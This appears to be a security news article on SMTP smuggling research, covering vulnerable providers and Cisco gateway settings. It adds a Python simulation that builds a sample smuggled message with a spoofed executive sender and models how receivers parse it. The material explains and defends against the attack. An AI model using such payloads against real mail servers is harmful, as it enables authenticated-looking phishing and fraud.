SMTP smuggling enables email spoofing while passing security checks

SEC Consult

Longin identified two big email providers whose SMTP servers interpreted <LF>.<LF> as the end of data: Fastmail and Runbox. He also found that popular SMTP server software such as Postfix and Sendmail accepted this end-of-data sequence in their default configurations. According to Shodan scans, more than 1.5 million publicly accessible SMTP servers run Postfix or Sendmail.

The researcher now had the ability to spoof any GMX identity to users of any of these vulnerable SMTP servers in a way where the messages would pass SPF, DKIM and DMARC validation, because they were delivered through the real GMX outbound SMTP server (an IP address that GMX's SPF record authorizes) without being blocked.

The issue was worse, because GMX also runs the domain and is a subsidiary of Ionos, a large web hosting company. It turns out Ionos's SMTP servers ran the same custom software as GMX's and therefore also allowed outbound email messages containing <LF>.<LF> sequences. Furthermore, the default SPF records for Ionos-hosted domains and for GMX shared IP addresses, meaning that an attacker could use a GMX account to spoof messages from any of the 1.35 million domain names that used Ionos's email servers while still passing security checks.

Like GMX and Ionos, Outlook and Microsoft Exchange Online also allowed outbound emails containing <LF>.<LF>. This meant that attackers could spoof valid messages from any of the millions of domains that list Exchange Online's SMTP servers in their SPF records.

However, the impact was more limited because Outlook and Exchange Online use the BDAT (chunking) command to send messages by default. This SMTP extension states the exact message length in bytes up front, so the receiver consumes that many bytes regardless of their content and never looks for an end-of-data sequence inside them, which makes SMTP smuggling impossible. There is a fallback, though, because not all receiving SMTP servers support BDAT: for those that don't, the Exchange servers fall back to the regular DATA command, whose message body is terminated by an end-of-data sequence.

To be vulnerable to spoofing via Exchange Online messages, an incoming SMTP server therefore needs to meet two conditions instead of one: not support BDAT, and interpret <LF>.<LF> as an end-of-data sequence. This was the case for Fastmail and remains the case for hundreds of thousands of Postfix and Sendmail deployments. Microsoft has since addressed the problem, and messages containing <LF>.<LF> sequences are no longer allowed out via Outlook and Exchange Online.

Cisco Secure Email settings could allow SMTP smuggling

While testing other, more exotic end-of-data sequences against the inbound SMTP servers of the former Alexa top 1,000 domains, Longin found several high-profile domains that accepted <CR>.<CR> as an end-of-data sequence. The domains included Amazon, PayPal, eBay, Cisco, the IRS, IMDb, and Audible.

All those domains were using Cisco's Secure Email service, either as on-premises deployments of Cisco Secure Email Gateway or as the cloud-based Cisco Secure Email Cloud Gateway. The Cisco Secure Email Gateway can be thought of as a proxy server that checks emails for malicious content before passing them on to the organization's real SMTP email server. The software has a configuration option for how to handle messages that contain bare carriage return (CR) or line feed (LF) characters, with three settings: Clean, Reject, or Allow.

The behavior of the "Clean" setting, which is the default, consists of converting bare CR or LF characters into CRLF. That means <CR>.<CR> is converted into <CR><LF>.<CR><LF>, which is the standard end-of-data sequence (\r\n.\r\n) that every SMTP server accepts. So, if you run an SMTP server that only accepts <CR><LF>.<CR><LF> as its end-of-data sequence, as it should, and you put Cisco Secure Email Gateway with default settings in front of it, you have just made it vulnerable to SMTP smuggling: the gateway rewrites a sequence your server would have ignored into one it must honor.

SEC Consult advises Cisco Secure Email Gateway users to change this setting from "Clean" to "Allow", so that messages containing <CR>.<CR> are forwarded to their SMTP servers without modification; a server that only honors <CR><LF>.<CR><LF> will then treat the sequence as ordinary message content rather than as a message boundary. Outbound SMTP servers that don't filter <CR>.<CR> and will let outbound emails containing this sequence through include Outlook/Exchange Online, iCloud, on-premises Microsoft Exchange servers, Postfix, Sendmail, Startmail, Fastmail, and Zohomail.
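To make the parsing behavior described above concrete, here is a toy Python model of the receiving side of the DATA phase. It is an added example and not code from the article, from SEC Consult or from any of the products named: the sample message, the envelope values and the receiver are constructed, and the `clean_bare_line_endings` function is only a model of the "Clean" setting as the article describes it, not Cisco's code. It covers both the <LF>.<LF> case discussed in the GMX and Exchange Online sections (including why BDAT is immune) and the <CR>.<CR> case behind a gateway that normalizes bare line endings.

```python
"""Toy model of SMTP DATA-phase parsing, to show how SMTP smuggling works.
Added example, not code from the article, SEC Consult or any named product."""
import re

CRLF = b"\r\n"
STRICT_EOD = rb"\r\n\.\r\n"   # RFC 5321 end-of-data sequence <CR><LF>.<CR><LF>
BARE_LF_EOD = rb"\n\.\n"      # <LF>.<LF>, accepted by lenient receivers
BARE_CR_EOD = rb"\r\.\r"      # <CR>.<CR>, the "exotic" variant

# Constructed attacker payload, sent to the outbound server as ONE message body.
# A strict outbound server ends DATA only at <CR><LF>.<CR><LF> and relays it all;
# a lenient inbound server stops at the embedded <LF>.<LF> and parses the rest
# as a new SMTP transaction with a spoofed envelope sender.
SMUGGLED_BODY = (
    b"From: attacker@example.com\r\n"
    b"To: victim@example.org\r\n"
    b"Subject: harmless\r\n"
    b"\r\n"
    b"first message body\r\n"
    b"\n.\n"                              # smuggled end-of-data sequence
    b"MAIL FROM:<ceo@example.com>\r\n"    # spoofed envelope sender
    b"RCPT TO:<victim@example.org>\r\n"
    b"DATA\r\n"
    b"From: ceo@example.com\r\n"
    b"Subject: urgent wire transfer\r\n"
    b"\r\n"
    b"second, spoofed message\r\n"
    b"\r\n.\r\n"                          # genuine end-of-data sequence
)
FIRST_ENVELOPE = {"mail_from": "<attacker@example.com>",
                  "rcpt_to": "<victim@example.org>"}


def end_of_data_regex(accept_bare_lf=False, accept_bare_cr=False):
    """Build the receiver's end-of-data matcher from the sequences it tolerates."""
    alternatives = [STRICT_EOD]
    if accept_bare_lf:
        alternatives.append(BARE_LF_EOD)
    if accept_bare_cr:
        alternatives.append(BARE_CR_EOD)
    return re.compile(b"|".join(alternatives))


def receive_data(stream, eod, first_envelope):
    """Model an inbound server reading the bytes after its first DATA command.
    Returns one dict per SMTP transaction the receiver believes it saw. After
    each end-of-data match the remaining bytes are parsed as commands again,
    which is how a smuggled second message gets its own (spoofed) envelope."""
    messages, envelope, pos = [], dict(first_envelope), 0
    while True:
        match = eod.search(stream, pos)
        if match is None:
            break                         # unterminated DATA: a real server waits
        messages.append({"body": stream[pos:match.start()], **envelope})
        pos, envelope = match.end(), {"mail_from": None, "rcpt_to": None}
        while pos < len(stream):          # command phase until the next DATA
            nl = stream.find(CRLF, pos)
            if nl == -1:
                return messages
            line, pos = stream[pos:nl], nl + len(CRLF)
            if line.upper().startswith(b"MAIL FROM:"):
                envelope["mail_from"] = line[10:].strip().decode()
            elif line.upper().startswith(b"RCPT TO:"):
                envelope["rcpt_to"] = line[8:].strip().decode()
            elif line.upper() == b"DATA":
                break
        else:
            break                         # stream ended in the command phase
    return messages


def receive_bdat(stream, chunk_len):
    """BDAT <n> LAST: exactly n bytes are the message, whatever they contain."""
    return stream[:chunk_len], stream[chunk_len:]


def clean_bare_line_endings(stream):
    """Model of the 'Clean' behaviour the article attributes to Cisco Secure Email
    Gateway (bare CR or LF becomes CRLF). An assumption based on the article's
    description, not Cisco's code."""
    return re.sub(rb"\r\n|\r|\n", CRLF, stream)


def demo():
    """Message counts each receiver configuration extracts from the same bytes."""
    strict, lenient = end_of_data_regex(), end_of_data_regex(accept_bare_lf=True)
    cr_payload = SMUGGLED_BODY.replace(b"\n.\n", b"\r.\r")   # <CR>.<CR> variant
    _, leftover = receive_bdat(SMUGGLED_BODY, len(SMUGGLED_BODY))
    return {
        "strict_receiver": len(receive_data(SMUGGLED_BODY, strict, FIRST_ENVELOPE)),
        "lenient_receiver": len(receive_data(SMUGGLED_BODY, lenient, FIRST_ENVELOPE)),
        "bdat_receiver": 1 + (1 if leftover else 0),
        "strict_behind_allow_gateway": len(receive_data(cr_payload, strict, FIRST_ENVELOPE)),
        "strict_behind_clean_gateway": len(
            receive_data(clean_bare_line_endings(cr_payload), strict, FIRST_ENVELOPE)),
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{name}: {count} message(s)")
```

Running the script shows the same bytes producing one message for a strict receiver, for a BDAT receiver and for a strict server behind a gateway set to "Allow", but two messages (the second with `MAIL FROM:<ceo@example.com>`) for a receiver that honors <LF>.<LF>, and likewise two for a strict server sitting behind a gateway that rewrites the <CR>.<CR> variant into <CR><LF>.<CR><LF>.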
